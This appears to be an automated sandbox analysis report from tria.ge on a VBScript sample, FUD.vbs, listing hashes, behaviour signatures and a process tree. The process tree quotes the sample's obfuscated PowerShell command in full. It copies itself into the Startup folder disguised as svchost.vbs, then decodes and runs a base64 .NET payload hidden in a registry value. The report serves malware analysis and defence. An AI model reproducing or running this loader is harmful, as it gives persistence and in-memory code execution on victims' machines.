Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
120s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
28/02/2025, 15:40
Static task
static1
Behavioral task
behavioral1
Sample
FUD.vbs
Resource
win7-20240903-en
5 signatures
150 seconds
General
-
Target
FUD.vbs
-
Size
325KB
-
MD5
d525be35ac5b7de70edb7c00529f1d83
-
SHA1
eef5cd4c355487132d225492acdc425fb0fe606d
-
SHA256
f9f35704de5a2355e9b8b7107613736b5501573cfb9794126867ccd73100ea98
-
SHA512
32e399504a0669e0c83872a947cf24955489f2b3f75dae83cec2798681f4249d6bac02f861436fcbf6b8d2321045ab7fbc6c006bf33ca1402429ce799e254830
-
SSDEEP
6144:PAbSQwEhvxxx06qUY2fVHavDdl8PI76KF51u7WJVzZF:PAbBlhqp2fZsDdlYI77BVlF
Score
6/10
Malware Config
Signatures
-
pid Process 2400 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2400 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2400 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2720 wrote to memory of 2400 2720 WScript.exe 30 PID 2720 wrote to memory of 2400 2720 WScript.exe 30 PID 2720 wrote to memory of 2400 2720 WScript.exe 30
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FUD.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -Command Copy-Item 'C:\Users\Admin\AppData\Local\Temp\FUD.vbs' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.vbs'; $roadtest = ((Get-ItemProperty HKCU:\Software\Chrome\).Updates); $roadtest = -join $roadtest[-1..-$roadtest.Length];[<##>AppDomain<##>]::<##>('seaserviceurrentDomain'.replace('seaservice','C'))<##>.<##>('digeneticoad'.replace('digenetic','L'))([Convert]::FromBase64String($roadtest))<##>.<##>('estocsntryPoint'.replace('estocs','E'))<##>.<##>('Instolonoke'.replace('stolon','v'))($Null,$Null)<##>;2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2400
-